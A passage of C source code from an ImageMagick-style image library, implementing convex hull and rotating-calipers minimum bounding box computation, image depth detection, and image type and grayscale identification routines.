static PixelInfo GetEdgeBackgroundColor(const Image *image,
const CacheView *image_view,ExceptionInfo *exception)
{
const char
*artifact;
double
census[4],
edge_census;
PixelInfo
background[4],
edge_background;
ssize_t
i;
/*
Most dominant color of edges/corners is the background color of the image.
*/
memset(&edge_background,0,sizeof(edge_background));
artifact=GetImageArtifact(image,"convex-hull:background-color");
if (artifact == (const char *) NULL)
artifact=GetImageArtifact(image,"background");
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static)
#endif
for (i=0; i < 4; i++)
{
CacheView
*edge_view;
GravityType
gravity;
Image
*edge_image;
PixelInfo
pixel;
RectangleInfo
edge_geometry;
const Quantum
*p;
ssize_t
y;
census[i]=0.0;
(void) memset(&edge_geometry,0,sizeof(edge_geometry));
switch (i)
{
case 0:
default:
{
p=GetCacheViewVirtualPixels(image_view,0,(ssize_t) image->rows-1,1,1,
exception);
gravity=WestGravity;
edge_geometry.width=1;
edge_geometry.height=0;
break;
}
case 1:
{
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,0,1,1,
exception);
gravity=EastGravity;
edge_geometry.width=1;
edge_geometry.height=0;
break;
}
case 2:
{
p=GetCacheViewVirtualPixels(image_view,0,0,1,1,exception);
gravity=NorthGravity;
edge_geometry.width=0;
edge_geometry.height=1;
break;
}
case 3:
{
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,
(ssize_t) image->rows-1,1,1,exception);
gravity=SouthGravity;
edge_geometry.width=0;
edge_geometry.height=1;
break;
}
}
GetPixelInfoPixel(image,p,background+i);
if (artifact != (const char *) NULL)
(void) QueryColorCompliance(artifact,AllCompliance,background+i,
exception);
GravityAdjustGeometry(image->columns,image->rows,gravity,&edge_geometry);
edge_image=CropImage(image,&edge_geometry,exception);
if (edge_image == (Image *) NULL)
continue;
edge_view=AcquireVirtualCacheView(edge_image,exception);
for (y=0; y < (ssize_t) edge_image->rows; y++)
{
ssize_t
x;
p=GetCacheViewVirtualPixels(edge_view,0,y,edge_image->columns,1,
exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) edge_image->columns; x++)
{
GetPixelInfoPixel(edge_image,p,&pixel);
if (IsFuzzyEquivalencePixelInfo(&pixel,background+i) == MagickFalse)
census[i]++;
p+=GetPixelChannels(edge_image);
}
}
edge_view=DestroyCacheView(edge_view);
edge_image=DestroyImage(edge_image);
}
edge_census=(-1.0);
for (i=0; i < 4; i++)
if (census[i] > edge_census)
{
edge_background=background[i];
edge_census=census[i];
}
return(edge_background);
}
void TraceConvexHull(PointInfo *vertices,size_t number_vertices,
PointInfo ***monotone_chain,size_t *chain_length)
{
PointInfo
**chain;
ssize_t
i;
size_t
demark,
n;
/*
Construct the upper and lower hulls: rightmost to leftmost counterclockwise.
*/
chain=(*monotone_chain);
n=0;
for (i=0; i < (ssize_t) number_vertices; i++)
{
while ((n >= 2) &&
(LexicographicalOrder(chain[n-2],chain[n-1],&vertices[i]) <= 0.0))
n--;
chain[n++]=(&vertices[i]);
}
demark=n+1;
for (i=(ssize_t) number_vertices-2; i >= 0; i--)
{
while ((n >= demark) &&
(LexicographicalOrder(chain[n-2],chain[n-1],&vertices[i]) <= 0.0))
n--;
chain[n++]=(&vertices[i]);
}
*chain_length=n;
}
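/*
Minimal usage sketch (hypothetical caller; names are illustrative): the
chain buffer must provide roughly 2*number_vertices slots, and the vertices
are expected in a consistent scan order, as produced by GetImageConvexHull():

PointInfo **chain=(PointInfo **) AcquireQuantumMemory(2*n,sizeof(*chain));
size_t hull_length;
TraceConvexHull(points,n,&chain,&hull_length);
*/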
MagickExport PointInfo *GetImageConvexHull(const Image *image,
size_t *number_vertices,ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
status;
MemoryInfo
*monotone_info,
*vertices_info;
PixelInfo
background;
PointInfo
*convex_hull,
**monotone_chain,
*vertices;
size_t
n;
ssize_t
y;
/*
Identify convex hull vertices of image foreground object(s).
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
*number_vertices=0;
vertices_info=AcquireVirtualMemory(image->columns,image->rows*
sizeof(*vertices));
monotone_info=AcquireVirtualMemory(2*image->columns,2*
image->rows*sizeof(*monotone_chain));
if ((vertices_info == (MemoryInfo *) NULL) ||
(monotone_info == (MemoryInfo *) NULL))
{
if (monotone_info != (MemoryInfo *) NULL)
monotone_info=(MemoryInfo *) RelinquishVirtualMemory(monotone_info);
if (vertices_info != (MemoryInfo *) NULL)
vertices_info=RelinquishVirtualMemory(vertices_info);
return((PointInfo *) NULL);
}
vertices=(PointInfo *) GetVirtualMemoryBlob(vertices_info);
monotone_chain=(PointInfo **) GetVirtualMemoryBlob(monotone_info);
image_view=AcquireVirtualCacheView(image,exception);
background=GetEdgeBackgroundColor(image,image_view,exception);
status=MagickTrue;
n=0;
for (y=0; y < (ssize_t) image->rows; y++)
{
const Quantum
*p;
ssize_t
x;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
{
status=MagickFalse;
continue;
}
for (x=0; x < (ssize_t) image->columns; x++)
{
PixelInfo
pixel;
GetPixelInfoPixel(image,p,&pixel);
if (IsFuzzyEquivalencePixelInfo(&pixel,&background) == MagickFalse)
{
vertices[n].x=(double) x;
vertices[n].y=(double) y;
n++;
}
p+=GetPixelChannels(image);
}
}
image_view=DestroyCacheView(image_view);
/*
Return the convex hull of the image foreground object(s).
*/
TraceConvexHull(vertices,n,&monotone_chain,number_vertices);
convex_hull=(PointInfo *) AcquireQuantumMemory(*number_vertices,
sizeof(*convex_hull));
if (convex_hull != (PointInfo *) NULL)
for (n=0; n < *number_vertices; n++)
convex_hull[n]=(*monotone_chain[n]);
monotone_info=RelinquishVirtualMemory(monotone_info);
vertices_info=RelinquishVirtualMemory(vertices_info);
return(convex_hull);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e D e p t h %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageDepth() returns the depth of a particular image channel.
%
% The format of the GetImageDepth method is:
%
% size_t GetImageDepth(const Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport size_t GetImageDepth(const Image *image,ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
status;
ssize_t
i;
size_t
*current_depth,
depth,
number_threads;
ssize_t
y;
/*
Compute image depth.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
current_depth=(size_t *) AcquireQuantumMemory(number_threads,
sizeof(*current_depth));
if (current_depth == (size_t *) NULL)
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
status=MagickTrue;
for (i=0; i < (ssize_t) number_threads; i++)
current_depth[i]=1;
if ((image->storage_class == PseudoClass) &&
(image->alpha_trait == UndefinedPixelTrait))
{
for (i=0; i < (ssize_t) image->colors; i++)
{
const int
id = GetOpenMPThreadId();
while (current_depth[id] < MAGICKCORE_QUANTUM_DEPTH)
{
MagickBooleanType
atDepth;
QuantumAny
range;
atDepth=MagickTrue;
range=GetQuantumRange(current_depth[id]);
if ((GetPixelRedTraits(image) & UpdatePixelTrait) != 0)
if (IsPixelAtDepth(ClampToQuantum(image->colormap[i].red),range) == MagickFalse)
atDepth=MagickFalse;
if ((atDepth != MagickFalse) &&
(GetPixelGreenTraits(image) & UpdatePixelTrait) != 0)
if (IsPixelAtDepth(ClampToQuantum(image->colormap[i].green),range) == MagickFalse)
atDepth=MagickFalse;
if ((atDepth != MagickFalse) &&
(GetPixelBlueTraits(image) & UpdatePixelTrait) != 0)
if (IsPixelAtDepth(ClampToQuantum(image->colormap[i].blue),range) == MagickFalse)
atDepth=MagickFalse;
if (atDepth != MagickFalse)
break;
current_depth[id]++;
}
}
depth=current_depth[0];
for (i=1; i < (ssize_t) number_threads; i++)
if (depth < current_depth[i])
depth=current_depth[i];
current_depth=(size_t *) RelinquishMagickMemory(current_depth);
return(depth);
}
image_view=AcquireVirtualCacheView(image,exception);
#if !defined(MAGICKCORE_HDRI_SUPPORT)
DisableMSCWarning(4127)
if ((1UL*QuantumRange) <= MaxMap)
RestoreMSCWarning
{
size_t
*depth_map;
/*
Scale pixels to desired (optimized with depth map).
*/
depth_map=(size_t *) AcquireQuantumMemory(MaxMap+1,sizeof(*depth_map));
if (depth_map == (size_t *) NULL)
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
for (i=0; i <= (ssize_t) MaxMap; i++)
{
for (depth=1; depth < (size_t) MAGICKCORE_QUANTUM_DEPTH; depth++)
{
Quantum
pixel;
QuantumAny
range;
range=GetQuantumRange(depth);
pixel=(Quantum) i;
if (pixel == ScaleAnyToQuantum(ScaleQuantumToAny(pixel,range),range))
break;
}
depth_map[i]=depth;
}
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
const Quantum
*magick_restrict p;
ssize_t
x;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
continue;
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
j;
for (j=0; j < (ssize_t) GetPixelChannels(image); j++)
{
PixelChannel channel = GetPixelChannelChannel(image,j);
PixelTrait traits = GetPixelChannelTraits(image,channel);
if ((traits & UpdatePixelTrait) == 0)
continue;
if (depth_map[ScaleQuantumToMap(p[j])] > current_depth[id])
current_depth[id]=depth_map[ScaleQuantumToMap(p[j])];
}
p+=GetPixelChannels(image);
}
if (current_depth[id] == MAGICKCORE_QUANTUM_DEPTH)
status=MagickFalse;
}
image_view=DestroyCacheView(image_view);
depth=current_depth[0];
for (i=1; i < (ssize_t) number_threads; i++)
if (depth < current_depth[i])
depth=current_depth[i];
depth_map=(size_t *) RelinquishMagickMemory(depth_map);
current_depth=(size_t *) RelinquishMagickMemory(current_depth);
return(depth);
}
#endif
/*
Compute pixel depth.
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
const Quantum
*magick_restrict p;
ssize_t
x;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
continue;
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
j;
for (j=0; j < (ssize_t) GetPixelChannels(image); j++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=GetPixelChannelChannel(image,j);
traits=GetPixelChannelTraits(image,channel);
if ((traits & UpdatePixelTrait) == 0)
continue;
while (current_depth[id] < MAGICKCORE_QUANTUM_DEPTH)
{
QuantumAny
range;
range=GetQuantumRange(current_depth[id]);
if (p[j] == ScaleAnyToQuantum(ScaleQuantumToAny(p[j],range),range))
break;
current_depth[id]++;
}
}
p+=GetPixelChannels(image);
}
if (current_depth[id] == MAGICKCORE_QUANTUM_DEPTH)
status=MagickFalse;
}
image_view=DestroyCacheView(image_view);
depth=current_depth[0];
for (i=1; i < (ssize_t) number_threads; i++)
if (depth < current_depth[i])
depth=current_depth[i];
current_depth=(size_t *) RelinquishMagickMemory(current_depth);
return(depth);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e M i n i m u m B o u n d i n g B o x %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageMinimumBoundingBox() returns the points that form the minimum
% bounding box around the image foreground objects with the "Rotating
% Calipers" algorithm. The method also returns these properties:
% minimum-bounding-box:area, minimum-bounding-box:width,
% minimum-bounding-box:height, and minimum-bounding-box:angle.
%
% The format of the GetImageMinimumBoundingBox method is:
%
% PointInfo *GetImageMinimumBoundingBox(Image *image,
% size_t number_vertices,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o number_vertices: the number of vertices in the bounding box.
%
% o exception: return any errors or warnings in this structure.
%
*/
typedef struct _CaliperInfo
{
double
area,
width,
height,
projection;
ssize_t
p,
q,
v;
} CaliperInfo;
static inline double getAngle(PointInfo *p,PointInfo *q)
{
/*
Get the angle between line (p,q) and horizontal axis, in degrees.
*/
return(RadiansToDegrees(atan2(q->y-p->y,q->x-p->x)));
}
static inline double getDistance(PointInfo *p,PointInfo *q)
{
double
distance;
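/* Note: despite the name, this returns the squared distance. */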
distance=hypot(p->x-q->x,p->y-q->y);
return(distance*distance);
}
static inline double getProjection(PointInfo *p,PointInfo *q,PointInfo *v)
{
double
distance;
/*
Projection of vector (x,y) - p into a line passing through p and q.
*/
distance=getDistance(p,q);
if (distance < MagickEpsilon)
return(INFINITY);
return((q->x-p->x)*(v->x-p->x)+(v->y-p->y)*(q->y-p->y))/sqrt(distance);
}
static inline double getFeretDiameter(PointInfo *p,PointInfo *q,PointInfo *v)
{
double
distance;
/*
Distance from a point (x,y) to a line passing through p and q.
*/
distance=getDistance(p,q);
if (distance < MagickEpsilon)
return(INFINITY);
return((q->x-p->x)*(v->y-p->y)-(v->x-p->x)*(q->y-p->y))/sqrt(distance);
}
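/*
getProjection() is the dot product of (v-p) with the unit vector along
(q-p), i.e. the signed distance of v along the caliper edge, while
getFeretDiameter() is the matching cross product, i.e. the signed
perpendicular distance of v from the line through p and q.
*/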
MagickExport PointInfo *GetImageMinimumBoundingBox(Image *image,
size_t *number_vertices,ExceptionInfo *exception)
{
CaliperInfo
caliper_info;
const char
*artifact;
double
angle,
diameter,
distance;
PointInfo
*bounding_box,
*vertices;
ssize_t
i;
size_t
number_hull_vertices;
/*
Generate the minimum bounding box with the "Rotating Calipers" algorithm.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
*number_vertices=0;
vertices=GetImageConvexHull(image,&number_hull_vertices,exception);
if (vertices == (PointInfo *) NULL)
return((PointInfo *) NULL);
*number_vertices=4;
bounding_box=(PointInfo *) AcquireQuantumMemory(*number_vertices,
sizeof(*bounding_box));
if (bounding_box == (PointInfo *) NULL)
{
vertices=(PointInfo *) RelinquishMagickMemory(vertices);
return((PointInfo *) NULL);
}
caliper_info.area=2.0*image->columns*image->rows;
caliper_info.width=(double) image->columns+image->rows;
caliper_info.height=0.0;
caliper_info.projection=0.0;
caliper_info.p=(-1);
caliper_info.q=(-1);
caliper_info.v=(-1);
for (i=0; i < (ssize_t) number_hull_vertices; i++)
{
double
area = 0.0,
max_projection = 0.0,
min_diameter = -1.0,
min_projection = 0.0;
ssize_t
j,
k;
ssize_t
p = -1,
q = -1,
v = -1;
for (j=0; j < (ssize_t) number_hull_vertices; j++)
{
diameter=fabs(getFeretDiameter(&vertices[i],
&vertices[(i+1) % number_hull_vertices],&vertices[j]));
if (min_diameter < diameter)
{
min_diameter=diameter;
p=i;
q=(i+1) % number_hull_vertices;
v=j;
}
}
for (k=0; k < (ssize_t) number_hull_vertices; k++)
{
double
projection;
/*
Rotating calipers.
*/
projection=getProjection(&vertices[p],&vertices[q],&vertices[k]);
min_projection=MagickMin(min_projection,projection);
max_projection=MagickMax(max_projection,projection);
}
area=min_diameter*(max_projection-min_projection);
if (caliper_info.area > area)
{
caliper_info.area=area;
caliper_info.width=min_diameter;
caliper_info.height=max_projection-min_projection;
caliper_info.projection=max_projection;
caliper_info.p=p;
caliper_info.q=q;
caliper_info.v=v;
}
}
/*
Initialize minimum bounding box.
*/
diameter=getFeretDiameter(&vertices[caliper_info.p],
&vertices[caliper_info.q],&vertices[caliper_info.v]);
angle=atan2(vertices[caliper_info.q].y-vertices[caliper_info.p].y,
vertices[caliper_info.q].x-vertices[caliper_info.p].x);
bounding_box[0].x=vertices[caliper_info.p].x+cos(angle)*
caliper_info.projection;
bounding_box[0].y=vertices[caliper_info.p].y+sin(angle)*
caliper_info.projection;
bounding_box[1].x=floor(bounding_box[0].x+cos(angle+MagickPI/2.0)*diameter+
0.5);
bounding_box[1].y=floor(bounding_box[0].y+sin(angle+MagickPI/2.0)*diameter+
0.5);
bounding_box[2].x=floor(bounding_box[1].x+cos(angle)*(-caliper_info.height)+
0.5);
bounding_box[2].y=floor(bounding_box[1].y+sin(angle)*(-caliper_info.height)+
0.5);
bounding_box[3].x=floor(bounding_box[2].x+cos(angle+MagickPI/2.0)*(-diameter)+
0.5);
bounding_box[3].y=floor(bounding_box[2].y+sin(angle+MagickPI/2.0)*(-diameter)+
0.5);
/*
Export minimum bounding box properties.
*/
(void) FormatImageProperty(image,"minimum-bounding-box:area","%.*g",
GetMagickPrecision(),caliper_info.area);
(void) FormatImageProperty(image,"minimum-bounding-box:width","%.*g",
GetMagickPrecision(),caliper_info.width);
(void) FormatImageProperty(image,"minimum-bounding-box:height","%.*g",
GetMagickPrecision(),caliper_info.height);
(void) FormatImageProperty(image,"minimum-bounding-box:_p","%.*g,%.*g",
GetMagickPrecision(),vertices[caliper_info.p].x,
GetMagickPrecision(),vertices[caliper_info.p].y);
(void) FormatImageProperty(image,"minimum-bounding-box:_q","%.*g,%.*g",
GetMagickPrecision(),vertices[caliper_info.q].x,
GetMagickPrecision(),vertices[caliper_info.q].y);
(void) FormatImageProperty(image,"minimum-bounding-box:_v","%.*g,%.*g",
GetMagickPrecision(),vertices[caliper_info.v].x,
GetMagickPrecision(),vertices[caliper_info.v].y);
/*
Find smallest angle to origin.
*/
distance=hypot(bounding_box[0].x,bounding_box[0].y);
angle=getAngle(&bounding_box[0],&bounding_box[1]);
for (i=1; i < 4; i++)
{
double d = hypot(bounding_box[i].x,bounding_box[i].y);
if (d < distance)
{
distance=d;
angle=getAngle(&bounding_box[i],&bounding_box[(i+1) % 4]);
}
}
artifact=GetImageArtifact(image,"minimum-bounding-box:orientation");
if (artifact != (const char *) NULL)
{
double
length,
q_length,
p_length;
PointInfo
delta,
point;
/*
Find smallest perpendicular distance from edge to origin.
*/
point=bounding_box[0];
for (i=1; i < 4; i++)
{
if (bounding_box[i].x < point.x)
point.x=bounding_box[i].x;
if (bounding_box[i].y < point.y)
point.y=bounding_box[i].y;
}
for (i=0; i < 4; i++)
{
bounding_box[i].x-=point.x;
bounding_box[i].y-=point.y;
}
for (i=0; i < 4; i++)
{
double
d,
intercept,
slope;
delta.x=bounding_box[(i+1) % 4].x-bounding_box[i].x;
delta.y=bounding_box[(i+1) % 4].y-bounding_box[i].y;
slope=delta.y*PerceptibleReciprocal(delta.x);
intercept=bounding_box[(i+1) % 4].y-slope*bounding_box[i].x;
d=fabs((slope*bounding_box[i].x-bounding_box[i].y+intercept)*
PerceptibleReciprocal(sqrt(slope*slope+1.0)));
if ((i == 0) || (d < distance))
{
distance=d;
point=delta;
}
}
angle=RadiansToDegrees(atan(point.y*PerceptibleReciprocal(point.x)));
length=hypot(point.x,point.y);
p_length=fabs((double) MagickMax(caliper_info.width,caliper_info.height)-
length);
q_length=fabs(length-(double) MagickMin(caliper_info.width,
caliper_info.height));
if (LocaleCompare(artifact,"landscape") == 0)
{
if (p_length > q_length)
angle+=(angle < 0.0) ? 90.0 : -90.0;
}
else
if (LocaleCompare(artifact,"portrait") == 0)
{
if (p_length < q_length)
angle+=(angle >= 0.0) ? 90.0 : -90.0;
}
}
(void) FormatImageProperty(image,"minimum-bounding-box:angle","%.*g",
GetMagickPrecision(),angle);
(void) FormatImageProperty(image,"minimum-bounding-box:unrotate","%.*g",
GetMagickPrecision(),-angle);
vertices=(PointInfo *) RelinquishMagickMemory(vertices);
return(bounding_box);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e Q u a n t u m D e p t h %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageQuantumDepth() returns the depth of the image rounded to a legal
% quantum depth: 8, 16, 32, or 64.
%
% The format of the GetImageQuantumDepth method is:
%
% size_t GetImageQuantumDepth(const Image *image,
% const MagickBooleanType constrain)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o constrain: A value other than MagickFalse, constrains the depth to
% a maximum of MAGICKCORE_QUANTUM_DEPTH.
%
*/
MagickExport size_t GetImageQuantumDepth(const Image *image,
const MagickBooleanType constrain)
{
size_t
depth;
depth=image->depth;
if (depth <= 8)
depth=8;
else
if (depth <= 16)
depth=16;
else
if (depth <= 32)
depth=32;
else
if (depth <= 64)
depth=64;
if (constrain != MagickFalse)
depth=(size_t) MagickMin((double) depth,(double) MAGICKCORE_QUANTUM_DEPTH);
return(depth);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e T y p e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageType() returns the type of image:
%
% Bilevel Grayscale GrayscaleMatte
% Palette PaletteMatte TrueColor
% TrueColorMatte ColorSeparation ColorSeparationMatte
%
% The format of the GetImageType method is:
%
% ImageType GetImageType(const Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport ImageType GetImageType(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->colorspace == CMYKColorspace)
{
if (image->alpha_trait == UndefinedPixelTrait)
return(ColorSeparationType);
return(ColorSeparationAlphaType);
}
if (IsImageMonochrome(image) != MagickFalse)
return(BilevelType);
if (IsImageGray(image) != MagickFalse)
{
if (image->alpha_trait != UndefinedPixelTrait)
return(GrayscaleAlphaType);
return(GrayscaleType);
}
if (IsPaletteImage(image) != MagickFalse)
{
if (image->alpha_trait != UndefinedPixelTrait)
return(PaletteAlphaType);
return(PaletteType);
}
if (image->alpha_trait != UndefinedPixelTrait)
return(TrueColorAlphaType);
return(TrueColorType);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I d e n t i f y I m a g e G r a y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IdentifyImageGray() returns grayscale if all the pixels in the image have
% the same red, green, and blue intensities, and bi-level if the intensity is
% either 0 or QuantumRange. Otherwise undefined is returned.
%
% The format of the IdentifyImageGray method is:
%
% ImageType IdentifyImageGray(const Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport ImageType IdentifyImageGray(const Image *image,
ExceptionInfo *exception)
{
CacheView
*image_view;
ImageType
type;
const Quantum
*p;
ssize_t
x;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if ((image->type == BilevelType) || (image->type == GrayscaleType) ||
(image->type == GrayscaleAlphaType))
return(image->type);
if (IssRGBCompatibleColorspace(image->colorspace) == MagickFalse)
return(UndefinedType);
type=BilevelType;
image_view=AcquireVirtualCacheView(image,exception);
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (IsPixelGray(image,p) == MagickFalse)
{
type=UndefinedType;
break;
}
if ((type == BilevelType) &&
(IsPixelMonochrome(image,p) == MagickFalse))
type=GrayscaleType;
p+=GetPixelChannels(image);
}
if (type == UndefinedType)
break;
}
image_view=DestroyCacheView(image_view);
if ((type == GrayscaleType) && (image->alpha_trait != UndefinedPixelTrait))
type=GrayscaleAlphaType;
return(type);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I d e n t i f y I m a g e M o n o c h r o m e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IdentifyImageMonochrome() returns MagickTrue if all the pixels in the image
% have the same red, green, and blue intensities and the intensity is either
% 0 or QuantumRange.
%
% The format of the IdentifyImageMonochrome method is:
%
% MagickBooleanType IdentifyImageMonochrome(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType IdentifyImageMonochrome(const Image *image,
ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
bilevel;
ssize_t
x;
const Quantum
*p;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->type == BilevelType)
return(MagickTrue);
if (IssRGBCompatibleColorspace(image->colorspace) == MagickFalse)
return(MagickFalse);
bilevel=MagickTrue;
image_view=AcquireVirtualCacheView(image,exception);
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (IsPixelMonochrome(image,p) == MagickFalse)
{
bilevel=MagickFalse;
break;
}
p+=GetPixelChannels(image);
}
if (bilevel == MagickFalse)
break;
}
image_view=DestroyCacheView(image_view);
return(bilevel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I d e n t i f y I m a g e T y p e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IdentifyImageType() returns the potential type of image:
%
% Bilevel Grayscale GrayscaleMatte
% Palette PaletteMatte TrueColor
% TrueColorMatte ColorSeparation ColorSeparationMatte
%
% To ensure the image type matches its potential, use SetImageType():
%
% (void) SetImageType(image,IdentifyImageType(image,exception),exception);
%
% The format of the IdentifyImageType method is:
%
% ImageType IdentifyImageType(const Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport ImageType IdentifyImageType(const Image *image,
ExceptionInfo *exception)
{
ImageType
type;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->colorspace == CMYKColorspace)
{
if (image->alpha_trait == UndefinedPixelTrait)
return(ColorSeparationType);
return(ColorSeparationAlphaType);
}
type=IdentifyImageGray(image,exception);
if ((type == BilevelType) || (type == GrayscaleType) ||
(type == GrayscaleAlphaType))
return(type);
if (IdentifyPaletteImage(image,exception) != MagickFalse)
{
if (image->alpha_trait != UndefinedPixelTrait)
return(PaletteAlphaType);
return(PaletteType);
}
if (image->alpha_trait != UndefinedPixelTrait)
return(TrueColorAlphaType);
return(TrueColorType);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s I m a g e G r a y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsImageGray() returns MagickTrue if the type of the image is grayscale or
% bi-level.
%
% The format of the IsImageGray method is:
%
% MagickBooleanType IsImageGray(const Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport MagickBooleanType IsImageGray(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if ((image->type == BilevelType) || (image->type == GrayscaleType) ||
(image->type == GrayscaleAlphaType))
return(MagickTrue);
return(MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s I m a g e M o n o c h r o m e %
% %
% %
% %
